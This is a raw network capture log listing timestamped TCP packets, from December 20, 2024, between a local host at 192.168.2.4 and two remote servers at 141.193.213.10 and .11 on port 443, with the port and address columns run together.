                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.391326904 CET44349871141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.396652937 CET49872443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.411516905 CET49873443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.411537886 CET44349873141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.427331924 CET49874443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.427354097 CET44349874141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.459086895 CET49873443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.474438906 CET49874443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.538023949 CET44349875141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.538219929 CET49875443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.538239002 CET44349875141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.541795969 CET44349875141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.541867018 CET49875443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.542222023 CET49875443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.542349100 CET49875443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.542359114 CET44349875141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.542397976 CET44349875141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.552378893 CET44349868141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.552504063 CET44349868141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.552599907 CET49868443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.552611113 CET44349868141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.552639008 CET44349868141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.552787066 CET44349868141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.552845001 CET49868443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.552870989 CET44349868141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.552917004 CET49868443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.552931070 CET44349868141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.553076982 CET44349868141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.553141117 CET49868443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.554670095 CET49868443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.554702997 CET44349868141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.555079937 CET49880443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.555116892 CET44349880141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.555360079 CET49880443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.555524111 CET44349869141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.555629015 CET44349869141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.555672884 CET49869443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.556118965 CET49880443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.556132078 CET44349880141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.558293104 CET49869443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.558303118 CET44349869141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.559711933 CET49881443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.559736013 CET44349881141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.559848070 CET49881443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.560172081 CET49881443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.560185909 CET44349881141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.587044954 CET49875443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.587079048 CET44349875141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.631690025 CET49875443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.683279991 CET44349877141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.683505058 CET49877443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.683569908 CET44349877141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.685060024 CET44349877141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.685128927 CET49877443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.685386896 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.685450077 CET49877443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.685539007 CET44349877141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.685760975 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.685777903 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.685940027 CET49877443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.685959101 CET44349877141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.686323881 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.686624050 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.686716080 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.686721087 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.686731100 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.689182043 CET44349878141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.689399958 CET49878443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.689407110 CET44349878141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.689589024 CET44349879141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.689765930 CET49879443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.689781904 CET44349879141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.692924976 CET44349878141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.692991018 CET49878443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.693319082 CET44349879141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.693392038 CET49879443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.694941044 CET49878443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.695116043 CET44349878141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.695395947 CET49879443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.695576906 CET44349879141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.696058035 CET49878443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.696064949 CET44349878141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.696353912 CET49879443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.696366072 CET44349879141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.726181030 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.726186037 CET49877443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.741425991 CET49878443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.741431952 CET49879443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.784954071 CET44349870141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.785000086 CET44349870141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.785036087 CET44349870141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.785073042 CET44349870141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.785096884 CET49870443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.785130024 CET44349870141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.785156965 CET49870443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.785202026 CET44349870141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.785257101 CET49870443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.786067963 CET49870443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.786087990 CET44349870141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.786544085 CET49882443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.786570072 CET44349882141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.786746979 CET49882443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.787303925 CET49882443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.787326097 CET44349882141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.792615891 CET44349871141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.792732000 CET44349871141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.792800903 CET49871443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.792810917 CET44349871141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.792889118 CET44349871141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.792953014 CET49871443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.792958975 CET44349871141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.793035984 CET44349871141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.793232918 CET49871443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.793239117 CET44349871141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.800201893 CET44349872141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.800329924 CET44349872141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.800414085 CET49872443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.800441027 CET44349872141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.800470114 CET44349872141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.800535917 CET49872443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.800565004 CET44349872141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.800740957 CET44349872141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.800801992 CET49872443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.800831079 CET44349872141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.800843000 CET44349871141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.800903082 CET49871443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.800909042 CET44349871141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.801094055 CET44349871141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.801141977 CET49871443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.801927090 CET49871443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.801935911 CET44349871141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.802232981 CET49883443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.802265882 CET44349883141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.802333117 CET49883443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.803271055 CET49883443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.803297043 CET44349883141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.813683033 CET44349873141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.813956976 CET44349873141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.814032078 CET49873443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.814959049 CET44349872141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.815011024 CET49873443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.815049887 CET44349873141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.815078020 CET49872443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.815099955 CET44349872141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.815445900 CET49884443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.815557003 CET44349884141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.815634012 CET49884443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.816035986 CET49884443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.816067934 CET44349884141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.819129944 CET44349874141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.819379091 CET44349874141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.819434881 CET49874443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.820482016 CET49874443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.820512056 CET44349874141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.820777893 CET49885443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.820837975 CET44349885141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.821052074 CET49885443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.821713924 CET49885443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.821736097 CET44349885141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.866410017 CET49872443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.919734955 CET44349872141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.960355043 CET49872443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.960377932 CET44349872141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.984432936 CET44349875141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.984493971 CET44349875141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.984596014 CET49875443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.984632015 CET44349875141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.984684944 CET44349875141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.984740973 CET49875443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.985455990 CET49875443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.985491037 CET44349875141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.985927105 CET49886443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.985986948 CET44349886141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.986126900 CET49886443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.986428022 CET49886443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.986457109 CET44349886141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.992373943 CET44349872141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.992444038 CET49872443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.992468119 CET44349872141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.996273041 CET44349872141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.996339083 CET49872443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:00.996356010 CET44349872141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.004237890 CET44349872141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.004302025 CET49872443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.004316092 CET44349872141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.012398005 CET44349872141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.012459040 CET49872443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.012474060 CET44349872141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.028384924 CET44349872141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.028451920 CET49872443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.028466940 CET44349872141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.036578894 CET44349872141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.036633015 CET49872443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.036642075 CET44349872141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.036672115 CET44349872141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.036825895 CET49872443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.044486046 CET44349872141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.052594900 CET44349872141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.052670956 CET49872443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.052687883 CET44349872141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.060801029 CET44349872141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.060867071 CET49872443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.060880899 CET44349872141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.061094046 CET44349872141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.061281919 CET49872443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.061435938 CET49872443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.061460972 CET44349872141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.061781883 CET49887443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.061847925 CET44349887141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.061930895 CET49887443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.062397957 CET49887443192.168.2.4141.193.213.10
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.062431097 CET44349887141.193.213.10192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.131345034 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.131480932 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.131556034 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.131584883 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.131613016 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.131664991 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.131694078 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.131844997 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.132101059 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.132131100 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.136488914 CET44349879141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.136614084 CET44349879141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.136682034 CET49879443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.136732101 CET44349879141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.136825085 CET44349879141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.137057066 CET44349879141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.137084961 CET49879443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.137134075 CET49879443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.137320042 CET49879443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.137346029 CET44349879141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.137665987 CET49888443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.137731075 CET44349888141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.137805939 CET49888443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.138349056 CET49888443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.138370037 CET44349888141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.139487982 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.139604092 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.139625072 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.143100977 CET44349878141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.143218994 CET44349878141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.143280983 CET49878443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.143297911 CET44349878141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.143521070 CET44349878141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.143583059 CET49878443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.145107985 CET49878443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.145136118 CET44349878141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.145390034 CET49889443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.145422935 CET44349889141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.145555973 CET49889443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.146213055 CET49889443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.146239996 CET44349889141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.147749901 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.147806883 CET49876443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.147820950 CET44349876141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.157573938 CET44349877141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.157687902 CET44349877141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.157741070 CET49877443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.157763958 CET44349877141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.157857895 CET44349877141.193.213.11192.168.2.4
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.157923937 CET49877443192.168.2.4141.193.213.11
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:01.157941103 CET44349877141.193.213.11192.168.2.4
